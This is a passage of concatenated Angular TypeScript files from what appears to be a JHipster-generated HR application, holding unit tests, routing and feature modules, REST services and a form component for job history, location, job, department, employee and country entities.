        const employee: IEmployeeMySuffix = { id: 'reinvent orchestrate' };
        jobHistory.employee = employee;

        const employeeCollection: IEmployeeMySuffix[] = [{ id: 'Africa synergy Albania' }];
        spyOn(employeeService, 'query').and.returnValue(of(new HttpResponse({ body: employeeCollection })));
        const expectedCollection: IEmployeeMySuffix[] = [employee, ...employeeCollection];
        spyOn(employeeService, 'addEmployeeMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);

        activatedRoute.data = of({ jobHistory });
        comp.ngOnInit();

        expect(employeeService.query).toHaveBeenCalled();
        expect(employeeService.addEmployeeMySuffixToCollectionIfMissing).toHaveBeenCalledWith(employeeCollection, employee);
        expect(comp.employeesCollection).toEqual(expectedCollection);
      });

      it('Should update editForm', () => {
        const jobHistory: IJobHistoryMySuffix = { id: 'CBA' };
        const job: IJobMySuffix = { id: 'ubiquitous' };
        jobHistory.job = job;
        const department: IDepartmentMySuffix = { id: 'web-readiness Iraq Cloned' };
        jobHistory.department = department;
        const employee: IEmployeeMySuffix = { id: 'mobile Granite' };
        jobHistory.employee = employee;

        activatedRoute.data = of({ jobHistory });
        comp.ngOnInit();

        expect(comp.editForm.value).toEqual(expect.objectContaining(jobHistory));
        expect(comp.jobsCollection).toContain(job);
        expect(comp.departmentsCollection).toContain(department);
        expect(comp.employeesCollection).toContain(employee);
      });
    });

    describe('save', () => {
      it('Should call update service on save for existing entity', () => {
        // GIVEN
        const saveSubject = new Subject();
        const jobHistory = { id: 'ABC' };
        spyOn(jobHistoryService, 'update').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ jobHistory });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.next(new HttpResponse({ body: jobHistory }));
        saveSubject.complete();

        // THEN
        expect(comp.previousState).toHaveBeenCalled();
        expect(jobHistoryService.update).toHaveBeenCalledWith(jobHistory);
        expect(comp.isSaving).toEqual(false);
      });

      it('Should call create service on save for new entity', () => {
        // GIVEN
        const saveSubject = new Subject();
        const jobHistory = new JobHistoryMySuffix();
        spyOn(jobHistoryService, 'create').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ jobHistory });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.next(new HttpResponse({ body: jobHistory }));
        saveSubject.complete();

        // THEN
        expect(jobHistoryService.create).toHaveBeenCalledWith(jobHistory);
        expect(comp.isSaving).toEqual(false);
        expect(comp.previousState).toHaveBeenCalled();
      });

      it('Should set isSaving to false on error', () => {
        // GIVEN
        const saveSubject = new Subject();
        const jobHistory = { id: 'ABC' };
        spyOn(jobHistoryService, 'update').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ jobHistory });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.error('This is an error!');

        // THEN
        expect(jobHistoryService.update).toHaveBeenCalledWith(jobHistory);
        expect(comp.isSaving).toEqual(false);
        expect(comp.previousState).not.toHaveBeenCalled();
      });
    });

    describe('Tracking relationships identifiers', () => {
      describe('trackJobMySuffixById', () => {
        it('Should return tracked JobMySuffix primary key', () => {
          const entity = { id: 'ABC' };
          const trackResult = comp.trackJobMySuffixById(0, entity);
          expect(trackResult).toEqual(entity.id);
        });
      });

      describe('trackDepartmentMySuffixById', () => {
        it('Should return tracked DepartmentMySuffix primary key', () => {
          const entity = { id: 'ABC' };
          const trackResult = comp.trackDepartmentMySuffixById(0, entity);
          expect(trackResult).toEqual(entity.id);
        });
      });

      describe('trackEmployeeMySuffixById', () => {
        it('Should return tracked EmployeeMySuffix primary key', () => {
          const entity = { id: 'ABC' };
          const trackResult = comp.trackEmployeeMySuffixById(0, entity);
          expect(trackResult).toEqual(entity.id);
        });
      });
    });
  });
});
<file_sep>import { TestBed } from '@angular/core/testing';
import { HttpClientTestingModule, HttpTestingController } from '@angular/common/http/testing';
import { ILocationMySuffix, LocationMySuffix } from '../location-my-suffix.model';
import { LocationMySuffixService } from './location-my-suffix.service';
// Unit tests for LocationMySuffixService. Each test arranges a fake HTTP
// backend via HttpTestingController, invokes one service method, flushes the
// mocked response, and asserts on the captured result.
describe('Service Tests', () => {
  describe('LocationMySuffix Service', () => {
    let service: LocationMySuffixService;
    let httpMock: HttpTestingController;
    let elemDefault: ILocationMySuffix;
    let expectedResult: ILocationMySuffix | ILocationMySuffix[] | boolean | null;

    beforeEach(() => {
      TestBed.configureTestingModule({
        imports: [HttpClientTestingModule],
      });
      expectedResult = null;
      service = TestBed.inject(LocationMySuffixService);
      httpMock = TestBed.inject(HttpTestingController);

      // Baseline entity used as the mocked server payload in the tests below.
      elemDefault = {
        id: 'AAAAAAA',
        streetAddress: 'AAAAAAA',
        postalCode: 'AAAAAAA',
        city: 'AAAAAAA',
        stateProvince: 'AAAAAAA',
      };
    });

    describe('Service methods', () => {
      it('should find an element', () => {
        const returnedFromService = Object.assign({}, elemDefault);

        service.find('ABC').subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'GET' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(elemDefault);
      });

      it('should create a LocationMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'ID',
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.create(new LocationMySuffix()).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'POST' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should update a LocationMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'BBBBBB',
            streetAddress: 'BBBBBB',
            postalCode: 'BBBBBB',
            city: 'BBBBBB',
            stateProvince: 'BBBBBB',
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.update(expected).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'PUT' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should partial update a LocationMySuffix', () => {
        const patchObject = Object.assign(
          {
            streetAddress: 'BBBBBB',
            city: 'BBBBBB',
          },
          new LocationMySuffix()
        );

        // NOTE: Object.assign mutates its first argument, so patchObject also
        // receives the default values here before it is sent as the PATCH body.
        const returnedFromService = Object.assign(patchObject, elemDefault);

        const expected = Object.assign({}, returnedFromService);

        service.partialUpdate(patchObject).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'PATCH' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should return a list of LocationMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'BBBBBB',
            streetAddress: 'BBBBBB',
            postalCode: 'BBBBBB',
            city: 'BBBBBB',
            stateProvince: 'BBBBBB',
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.query().subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'GET' });
        req.flush([returnedFromService]);
        httpMock.verify();
        expect(expectedResult).toContainEqual(expected);
      });

      it('should delete a LocationMySuffix', () => {
        service.delete('ABC').subscribe(resp => (expectedResult = resp.ok));

        const req = httpMock.expectOne({ method: 'DELETE' });
        req.flush({ status: 200 });
        expect(expectedResult);
      });

      // Tests for the client-side de-duplication helper (no HTTP involved).
      describe('addLocationMySuffixToCollectionIfMissing', () => {
        it('should add a LocationMySuffix to an empty array', () => {
          const location: ILocationMySuffix = { id: 'ABC' };
          expectedResult = service.addLocationMySuffixToCollectionIfMissing([], location);
          expect(expectedResult).toHaveLength(1);
          expect(expectedResult).toContain(location);
        });

        it('should not add a LocationMySuffix to an array that contains it', () => {
          const location: ILocationMySuffix = { id: 'ABC' };
          const locationCollection: ILocationMySuffix[] = [
            {
              ...location,
            },
            { id: 'CBA' },
          ];
          expectedResult = service.addLocationMySuffixToCollectionIfMissing(locationCollection, location);
          expect(expectedResult).toHaveLength(2);
        });

        it("should add a LocationMySuffix to an array that doesn't contain it", () => {
          const location: ILocationMySuffix = { id: 'ABC' };
          const locationCollection: ILocationMySuffix[] = [{ id: 'CBA' }];
          expectedResult = service.addLocationMySuffixToCollectionIfMissing(locationCollection, location);
          expect(expectedResult).toHaveLength(2);
          expect(expectedResult).toContain(location);
        });

        it('should add only unique LocationMySuffix to an array', () => {
          const locationArray: ILocationMySuffix[] = [{ id: 'ABC' }, { id: 'CBA' }, { id: 'Grocery the program' }];
          const locationCollection: ILocationMySuffix[] = [{ id: 'ABC' }];
          expectedResult = service.addLocationMySuffixToCollectionIfMissing(locationCollection, ...locationArray);
          expect(expectedResult).toHaveLength(3);
        });

        it('should accept varargs', () => {
          const location: ILocationMySuffix = { id: 'ABC' };
          const location2: ILocationMySuffix = { id: 'CBA' };
          expectedResult = service.addLocationMySuffixToCollectionIfMissing([], location, location2);
          expect(expectedResult).toHaveLength(2);
          expect(expectedResult).toContain(location);
          expect(expectedResult).toContain(location2);
        });

        it('should accept null and undefined values', () => {
          const location: ILocationMySuffix = { id: 'ABC' };
          expectedResult = service.addLocationMySuffixToCollectionIfMissing([], null, location, undefined);
          expect(expectedResult).toHaveLength(1);
          expect(expectedResult).toContain(location);
        });
      });
    });

    afterEach(() => {
      // Fails the test when any unmatched or outstanding requests remain.
      httpMock.verify();
    });
  });
});
<file_sep>import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { UserRouteAccessService } from 'app/core/auth/user-route-access.service';
import { RegionMySuffixComponent } from '../list/region-my-suffix.component';
import { RegionMySuffixDetailComponent } from '../detail/region-my-suffix-detail.component';
import { RegionMySuffixUpdateComponent } from '../update/region-my-suffix-update.component';
import { RegionMySuffixRoutingResolveService } from './region-my-suffix-routing-resolve.service';
// Child route table for the Region entity: list, detail view, create and
// edit. Every route is guarded by UserRouteAccessService; the view/new/edit
// routes resolve the entity through RegionMySuffixRoutingResolveService
// before the component is activated.
const regionRoute: Routes = [
  {
    path: '',
    component: RegionMySuffixComponent,
    canActivate: [UserRouteAccessService],
  },
  {
    path: ':id/view',
    component: RegionMySuffixDetailComponent,
    resolve: {
      region: RegionMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
  {
    path: 'new',
    component: RegionMySuffixUpdateComponent,
    resolve: {
      region: RegionMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
  {
    path: ':id/edit',
    component: RegionMySuffixUpdateComponent,
    resolve: {
      region: RegionMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
];

/** Registers the Region entity routes with the Angular router. */
@NgModule({
  imports: [RouterModule.forChild(regionRoute)],
  exports: [RouterModule],
})
export class RegionMySuffixRoutingModule {}
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { JobHistoryMySuffixComponent } from './list/job-history-my-suffix.component';
import { JobHistoryMySuffixDetailComponent } from './detail/job-history-my-suffix-detail.component';
import { JobHistoryMySuffixUpdateComponent } from './update/job-history-my-suffix-update.component';
import { JobHistoryMySuffixDeleteDialogComponent } from './delete/job-history-my-suffix-delete-dialog.component';
import { JobHistoryMySuffixRoutingModule } from './route/job-history-my-suffix-routing.module';
/**
 * Feature module for the JobHistory entity: bundles the list, detail,
 * update and delete-dialog components together with their routing.
 */
@NgModule({
  imports: [SharedModule, JobHistoryMySuffixRoutingModule],
  declarations: [
    JobHistoryMySuffixComponent,
    JobHistoryMySuffixDetailComponent,
    JobHistoryMySuffixUpdateComponent,
    JobHistoryMySuffixDeleteDialogComponent,
  ],
  // The delete dialog is instantiated dynamically, hence the entry component.
  entryComponents: [JobHistoryMySuffixDeleteDialogComponent],
})
export class JobHistoryMySuffixModule {}
<file_sep>import { Injectable } from '@angular/core';
import { HttpClient, HttpResponse } from '@angular/common/http';
import { Observable } from 'rxjs';
import { map } from 'rxjs/operators';
import * as dayjs from 'dayjs';
import { isPresent } from 'app/core/util/operators';
import { ApplicationConfigService } from 'app/core/config/application-config.service';
import { createRequestOption } from 'app/core/request/request-util';
import { IJobHistoryMySuffix, getJobHistoryMySuffixIdentifier } from '../job-history-my-suffix.model';
export type EntityResponseType = HttpResponse<IJobHistoryMySuffix>;
export type EntityArrayResponseType = HttpResponse<IJobHistoryMySuffix[]>;

/**
 * REST client for JobHistory entities.
 *
 * startDate/endDate are dayjs objects on the client; they are serialized to
 * JSON strings before each request and converted back to dayjs on responses.
 */
@Injectable({ providedIn: 'root' })
export class JobHistoryMySuffixService {
  // Base REST endpoint for job-history resources.
  public resourceUrl = this.applicationConfigService.getEndpointFor('api/job-histories');

  constructor(protected http: HttpClient, private applicationConfigService: ApplicationConfigService) {}

  /** POSTs a new job history; dates are converted in both directions. */
  create(jobHistory: IJobHistoryMySuffix): Observable<EntityResponseType> {
    const copy = this.convertDateFromClient(jobHistory);
    return this.http
      .post<IJobHistoryMySuffix>(this.resourceUrl, copy, { observe: 'response' })
      .pipe(map((res: EntityResponseType) => this.convertDateFromServer(res)));
  }

  /** PUTs a full replacement of an existing job history (keyed by its id). */
  update(jobHistory: IJobHistoryMySuffix): Observable<EntityResponseType> {
    const copy = this.convertDateFromClient(jobHistory);
    return this.http
      .put<IJobHistoryMySuffix>(`${this.resourceUrl}/${getJobHistoryMySuffixIdentifier(jobHistory) as string}`, copy, {
        observe: 'response',
      })
      .pipe(map((res: EntityResponseType) => this.convertDateFromServer(res)));
  }

  /** PATCHes only the fields present on the given partial entity. */
  partialUpdate(jobHistory: IJobHistoryMySuffix): Observable<EntityResponseType> {
    const copy = this.convertDateFromClient(jobHistory);
    return this.http
      .patch<IJobHistoryMySuffix>(`${this.resourceUrl}/${getJobHistoryMySuffixIdentifier(jobHistory) as string}`, copy, {
        observe: 'response',
      })
      .pipe(map((res: EntityResponseType) => this.convertDateFromServer(res)));
  }

  /** GETs a single job history by id. */
  find(id: string): Observable<EntityResponseType> {
    return this.http
      .get<IJobHistoryMySuffix>(`${this.resourceUrl}/${id}`, { observe: 'response' })
      .pipe(map((res: EntityResponseType) => this.convertDateFromServer(res)));
  }

  /** GETs a list of job histories; `req` is turned into query parameters. */
  query(req?: any): Observable<EntityArrayResponseType> {
    const options = createRequestOption(req);
    return this.http
      .get<IJobHistoryMySuffix[]>(this.resourceUrl, { params: options, observe: 'response' })
      .pipe(map((res: EntityArrayResponseType) => this.convertDateArrayFromServer(res)));
  }

  /** DELETEs the job history with the given id. */
  delete(id: string): Observable<HttpResponse<{}>> {
    return this.http.delete(`${this.resourceUrl}/${id}`, { observe: 'response' });
  }

  /**
   * Prepends any entities from `jobHistoriesToCheck` not already present in
   * `jobHistoryCollection` (compared by id). Null/undefined entries are
   * skipped; the original array is returned untouched when nothing to check.
   */
  addJobHistoryMySuffixToCollectionIfMissing(
    jobHistoryCollection: IJobHistoryMySuffix[],
    ...jobHistoriesToCheck: (IJobHistoryMySuffix | null | undefined)[]
  ): IJobHistoryMySuffix[] {
    const jobHistories: IJobHistoryMySuffix[] = jobHistoriesToCheck.filter(isPresent);
    if (jobHistories.length > 0) {
      const jobHistoryCollectionIdentifiers = jobHistoryCollection.map(jobHistoryItem => getJobHistoryMySuffixIdentifier(jobHistoryItem)!);
      const jobHistoriesToAdd = jobHistories.filter(jobHistoryItem => {
        const jobHistoryIdentifier = getJobHistoryMySuffixIdentifier(jobHistoryItem);
        if (jobHistoryIdentifier == null || jobHistoryCollectionIdentifiers.includes(jobHistoryIdentifier)) {
          return false;
        }
        // Track the id so duplicates within jobHistoriesToCheck are also dropped.
        jobHistoryCollectionIdentifiers.push(jobHistoryIdentifier);
        return true;
      });
      return [...jobHistoriesToAdd, ...jobHistoryCollection];
    }
    return jobHistoryCollection;
  }

  /** Returns a copy with dayjs dates serialized to ISO strings for the API. */
  protected convertDateFromClient(jobHistory: IJobHistoryMySuffix): IJobHistoryMySuffix {
    return Object.assign({}, jobHistory, {
      startDate: jobHistory.startDate?.isValid() ? jobHistory.startDate.toJSON() : undefined,
      endDate: jobHistory.endDate?.isValid() ? jobHistory.endDate.toJSON() : undefined,
    });
  }

  /** Rehydrates date strings on the response body into dayjs objects (in place). */
  protected convertDateFromServer(res: EntityResponseType): EntityResponseType {
    if (res.body) {
      res.body.startDate = res.body.startDate ? dayjs(res.body.startDate) : undefined;
      res.body.endDate = res.body.endDate ? dayjs(res.body.endDate) : undefined;
    }
    return res;
  }

  /** Rehydrates dates on every element of a list response (mutates in place). */
  protected convertDateArrayFromServer(res: EntityArrayResponseType): EntityArrayResponseType {
    if (res.body) {
      res.body.forEach((jobHistory: IJobHistoryMySuffix) => {
        jobHistory.startDate = jobHistory.startDate ? dayjs(jobHistory.startDate) : undefined;
        jobHistory.endDate = jobHistory.endDate ? dayjs(jobHistory.endDate) : undefined;
      });
    }
    return res;
  }
}
<file_sep>import { ICountryMySuffix } from 'app/entities/country-my-suffix/country-my-suffix.model';
/** Shape of a Location entity as exchanged with the REST API. */
export interface ILocationMySuffix {
  id?: string;
  streetAddress?: string | null;
  postalCode?: string | null;
  city?: string | null;
  stateProvince?: string | null;
  country?: ICountryMySuffix | null;
}

/** Concrete Location implementation; every field is optional/nullable. */
export class LocationMySuffix implements ILocationMySuffix {
  constructor(
    public id?: string,
    public streetAddress?: string | null,
    public postalCode?: string | null,
    public city?: string | null,
    public stateProvince?: string | null,
    public country?: ICountryMySuffix | null
  ) {}
}

/** Returns the location's primary key, or undefined when no id is set. */
export function getLocationMySuffixIdentifier(location: ILocationMySuffix): string | undefined {
  return location.id;
}
<file_sep>import { Injectable } from '@angular/core';
import { HttpClient, HttpResponse } from '@angular/common/http';
import { Observable } from 'rxjs';
import { isPresent } from 'app/core/util/operators';
import { ApplicationConfigService } from 'app/core/config/application-config.service';
import { createRequestOption } from 'app/core/request/request-util';
import { IJobMySuffix, getJobMySuffixIdentifier } from '../job-my-suffix.model';
export type EntityResponseType = HttpResponse<IJobMySuffix>;
export type EntityArrayResponseType = HttpResponse<IJobMySuffix[]>;
/**
 * REST client for Job entities: plain CRUD over `api/jobs` plus a helper
 * that merges jobs into an existing collection without duplicating ids.
 */
@Injectable({ providedIn: 'root' })
export class JobMySuffixService {
  // Base REST endpoint for job resources.
  public resourceUrl = this.applicationConfigService.getEndpointFor('api/jobs');

  constructor(protected http: HttpClient, private applicationConfigService: ApplicationConfigService) {}

  /** POSTs a new job and returns the created entity. */
  create(job: IJobMySuffix): Observable<EntityResponseType> {
    return this.http.post<IJobMySuffix>(this.resourceUrl, job, { observe: 'response' });
  }

  /** PUTs a full replacement of an existing job, keyed by its id. */
  update(job: IJobMySuffix): Observable<EntityResponseType> {
    const url = `${this.resourceUrl}/${getJobMySuffixIdentifier(job) as string}`;
    return this.http.put<IJobMySuffix>(url, job, { observe: 'response' });
  }

  /** PATCHes only the fields present on the given partial job. */
  partialUpdate(job: IJobMySuffix): Observable<EntityResponseType> {
    const url = `${this.resourceUrl}/${getJobMySuffixIdentifier(job) as string}`;
    return this.http.patch<IJobMySuffix>(url, job, { observe: 'response' });
  }

  /** GETs a single job by id. */
  find(id: string): Observable<EntityResponseType> {
    return this.http.get<IJobMySuffix>(`${this.resourceUrl}/${id}`, { observe: 'response' });
  }

  /** GETs a list of jobs; `req` is translated into query parameters. */
  query(req?: any): Observable<EntityArrayResponseType> {
    const params = createRequestOption(req);
    return this.http.get<IJobMySuffix[]>(this.resourceUrl, { params, observe: 'response' });
  }

  /** DELETEs the job with the given id. */
  delete(id: string): Observable<HttpResponse<{}>> {
    return this.http.delete(`${this.resourceUrl}/${id}`, { observe: 'response' });
  }

  /**
   * Prepends any jobs from `jobsToCheck` that are not already present in
   * `jobCollection`, compared by id. Null/undefined entries are skipped and
   * duplicates within `jobsToCheck` itself are only added once. Returns the
   * input collection unchanged when there is nothing to check.
   */
  addJobMySuffixToCollectionIfMissing(jobCollection: IJobMySuffix[], ...jobsToCheck: (IJobMySuffix | null | undefined)[]): IJobMySuffix[] {
    const candidates: IJobMySuffix[] = jobsToCheck.filter(isPresent);
    if (candidates.length === 0) {
      return jobCollection;
    }
    const knownIdentifiers = new Set(jobCollection.map(jobItem => getJobMySuffixIdentifier(jobItem)!));
    const jobsToAdd: IJobMySuffix[] = [];
    for (const candidate of candidates) {
      const identifier = getJobMySuffixIdentifier(candidate);
      if (identifier != null && !knownIdentifiers.has(identifier)) {
        knownIdentifiers.add(identifier);
        jobsToAdd.push(candidate);
      }
    }
    return [...jobsToAdd, ...jobCollection];
  }
}
<file_sep>import { Component, OnInit } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { FormBuilder, Validators } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { Observable } from 'rxjs';
import { finalize, map } from 'rxjs/operators';
import { IDepartmentMySuffix, DepartmentMySuffix } from '../department-my-suffix.model';
import { DepartmentMySuffixService } from '../service/department-my-suffix.service';
import { ILocationMySuffix } from 'app/entities/location-my-suffix/location-my-suffix.model';
import { LocationMySuffixService } from 'app/entities/location-my-suffix/service/location-my-suffix.service';
/**
 * Create/edit form for a Department. The entity to edit arrives through the
 * route resolver; the one-to-one Location candidates are loaded separately.
 */
@Component({
  selector: 'jhi-department-my-suffix-update',
  templateUrl: './department-my-suffix-update.component.html',
})
export class DepartmentMySuffixUpdateComponent implements OnInit {
  isSaving = false;

  // Candidate locations for the one-to-one relationship.
  locationsCollection: ILocationMySuffix[] = [];

  editForm = this.fb.group({
    id: [],
    departmentName: [null, [Validators.required]],
    location: [],
  });

  constructor(
    protected departmentService: DepartmentMySuffixService,
    protected locationService: LocationMySuffixService,
    protected activatedRoute: ActivatedRoute,
    protected fb: FormBuilder
  ) {}

  ngOnInit(): void {
    this.activatedRoute.data.subscribe(({ department }) => {
      this.updateForm(department);
      this.loadRelationshipsOptions();
    });
  }

  /** Navigates back to wherever the user came from. */
  previousState(): void {
    window.history.back();
  }

  /** Persists the form: update when the entity has an id, create otherwise. */
  save(): void {
    this.isSaving = true;
    const department = this.createFromForm();
    const request =
      department.id === undefined ? this.departmentService.create(department) : this.departmentService.update(department);
    this.subscribeToSaveResponse(request);
  }

  /** trackBy helper keyed on the location id. */
  trackLocationMySuffixById(index: number, item: ILocationMySuffix): string {
    return item.id!;
  }

  protected subscribeToSaveResponse(result: Observable<HttpResponse<IDepartmentMySuffix>>): void {
    result.pipe(finalize(() => this.onSaveFinalize())).subscribe(
      () => this.onSaveSuccess(),
      () => this.onSaveError()
    );
  }

  protected onSaveSuccess(): void {
    this.previousState();
  }

  protected onSaveError(): void {
    // Api for inheritance.
  }

  protected onSaveFinalize(): void {
    this.isSaving = false;
  }

  /** Copies the resolved entity into the form and its location into the options. */
  protected updateForm(department: IDepartmentMySuffix): void {
    this.editForm.patchValue({
      id: department.id,
      departmentName: department.departmentName,
      location: department.location,
    });
    this.locationsCollection = this.locationService.addLocationMySuffixToCollectionIfMissing(this.locationsCollection, department.location);
  }

  /** Loads locations not yet bound to a department, keeping the current selection. */
  protected loadRelationshipsOptions(): void {
    this.locationService
      .query({ filter: 'department-is-null' })
      .pipe(
        map((res: HttpResponse<ILocationMySuffix[]>) => res.body ?? []),
        map((locations: ILocationMySuffix[]) =>
          this.locationService.addLocationMySuffixToCollectionIfMissing(locations, this.editForm.get('location')!.value)
        )
      )
      .subscribe((locations: ILocationMySuffix[]) => (this.locationsCollection = locations));
  }

  /** Builds an entity from the current form values. */
  protected createFromForm(): IDepartmentMySuffix {
    return {
      ...new DepartmentMySuffix(),
      id: this.editForm.get(['id'])!.value,
      departmentName: this.editForm.get(['departmentName'])!.value,
      location: this.editForm.get(['location'])!.value,
    };
  }
}
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { EmployeeMySuffixComponent } from './list/employee-my-suffix.component';
import { EmployeeMySuffixDetailComponent } from './detail/employee-my-suffix-detail.component';
import { EmployeeMySuffixUpdateComponent } from './update/employee-my-suffix-update.component';
import { EmployeeMySuffixDeleteDialogComponent } from './delete/employee-my-suffix-delete-dialog.component';
import { EmployeeMySuffixRoutingModule } from './route/employee-my-suffix-routing.module';
/**
 * Feature module for the Employee entity: bundles the list, detail,
 * update and delete-dialog components together with their routing.
 */
@NgModule({
  imports: [SharedModule, EmployeeMySuffixRoutingModule],
  declarations: [
    EmployeeMySuffixComponent,
    EmployeeMySuffixDetailComponent,
    EmployeeMySuffixUpdateComponent,
    EmployeeMySuffixDeleteDialogComponent,
  ],
  // The delete dialog is instantiated dynamically, hence the entry component.
  entryComponents: [EmployeeMySuffixDeleteDialogComponent],
})
export class EmployeeMySuffixModule {}
<file_sep>import { TestBed } from '@angular/core/testing';
import { HttpClientTestingModule, HttpTestingController } from '@angular/common/http/testing';
import { ICountryMySuffix, CountryMySuffix } from '../country-my-suffix.model';
import { CountryMySuffixService } from './country-my-suffix.service';
// Unit tests for CountryMySuffixService. Each test arranges a fake HTTP
// backend via HttpTestingController, invokes one service method, flushes the
// mocked response, and asserts on the captured result.
describe('Service Tests', () => {
  describe('CountryMySuffix Service', () => {
    let service: CountryMySuffixService;
    let httpMock: HttpTestingController;
    let elemDefault: ICountryMySuffix;
    let expectedResult: ICountryMySuffix | ICountryMySuffix[] | boolean | null;

    beforeEach(() => {
      TestBed.configureTestingModule({
        imports: [HttpClientTestingModule],
      });
      expectedResult = null;
      service = TestBed.inject(CountryMySuffixService);
      httpMock = TestBed.inject(HttpTestingController);

      // Baseline entity used as the mocked server payload in the tests below.
      elemDefault = {
        id: 'AAAAAAA',
        countryName: 'AAAAAAA',
      };
    });

    describe('Service methods', () => {
      it('should find an element', () => {
        const returnedFromService = Object.assign({}, elemDefault);

        service.find('ABC').subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'GET' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(elemDefault);
      });

      it('should create a CountryMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'ID',
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.create(new CountryMySuffix()).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'POST' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should update a CountryMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'BBBBBB',
            countryName: 'BBBBBB',
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.update(expected).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'PUT' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should partial update a CountryMySuffix', () => {
        const patchObject = Object.assign(
          {
            countryName: 'BBBBBB',
          },
          new CountryMySuffix()
        );

        // NOTE: Object.assign mutates its first argument, so patchObject also
        // receives the default values here before it is sent as the PATCH body.
        const returnedFromService = Object.assign(patchObject, elemDefault);

        const expected = Object.assign({}, returnedFromService);

        service.partialUpdate(patchObject).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'PATCH' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should return a list of CountryMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'BBBBBB',
            countryName: 'BBBBBB',
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.query().subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'GET' });
        req.flush([returnedFromService]);
        httpMock.verify();
        expect(expectedResult).toContainEqual(expected);
      });

      it('should delete a CountryMySuffix', () => {
        service.delete('ABC').subscribe(resp => (expectedResult = resp.ok));

        const req = httpMock.expectOne({ method: 'DELETE' });
        req.flush({ status: 200 });
        expect(expectedResult);
      });

      // Tests for the client-side de-duplication helper (no HTTP involved).
      describe('addCountryMySuffixToCollectionIfMissing', () => {
        it('should add a CountryMySuffix to an empty array', () => {
          const country: ICountryMySuffix = { id: 'ABC' };
          expectedResult = service.addCountryMySuffixToCollectionIfMissing([], country);
          expect(expectedResult).toHaveLength(1);
          expect(expectedResult).toContain(country);
        });

        it('should not add a CountryMySuffix to an array that contains it', () => {
          const country: ICountryMySuffix = { id: 'ABC' };
          const countryCollection: ICountryMySuffix[] = [
            {
              ...country,
            },
            { id: 'CBA' },
          ];
          expectedResult = service.addCountryMySuffixToCollectionIfMissing(countryCollection, country);
          expect(expectedResult).toHaveLength(2);
        });

        it("should add a CountryMySuffix to an array that doesn't contain it", () => {
          const country: ICountryMySuffix = { id: 'ABC' };
          const countryCollection: ICountryMySuffix[] = [{ id: 'CBA' }];
          expectedResult = service.addCountryMySuffixToCollectionIfMissing(countryCollection, country);
          expect(expectedResult).toHaveLength(2);
          expect(expectedResult).toContain(country);
        });

        it('should add only unique CountryMySuffix to an array', () => {
          const countryArray: ICountryMySuffix[] = [{ id: 'ABC' }, { id: 'CBA' }, { id: 'Stravenue Usability' }];
          const countryCollection: ICountryMySuffix[] = [{ id: 'ABC' }];
          expectedResult = service.addCountryMySuffixToCollectionIfMissing(countryCollection, ...countryArray);
          expect(expectedResult).toHaveLength(3);
        });

        it('should accept varargs', () => {
          const country: ICountryMySuffix = { id: 'ABC' };
          const country2: ICountryMySuffix = { id: 'CBA' };
          expectedResult = service.addCountryMySuffixToCollectionIfMissing([], country, country2);
          expect(expectedResult).toHaveLength(2);
          expect(expectedResult).toContain(country);
          expect(expectedResult).toContain(country2);
        });

        it('should accept null and undefined values', () => {
          const country: ICountryMySuffix = { id: 'ABC' };
          expectedResult = service.addCountryMySuffixToCollectionIfMissing([], null, country, undefined);
          expect(expectedResult).toHaveLength(1);
          expect(expectedResult).toContain(country);
        });
      });
    });

    afterEach(() => {
      // Fails the test when any unmatched or outstanding requests remain.
      httpMock.verify();
    });
  });
});
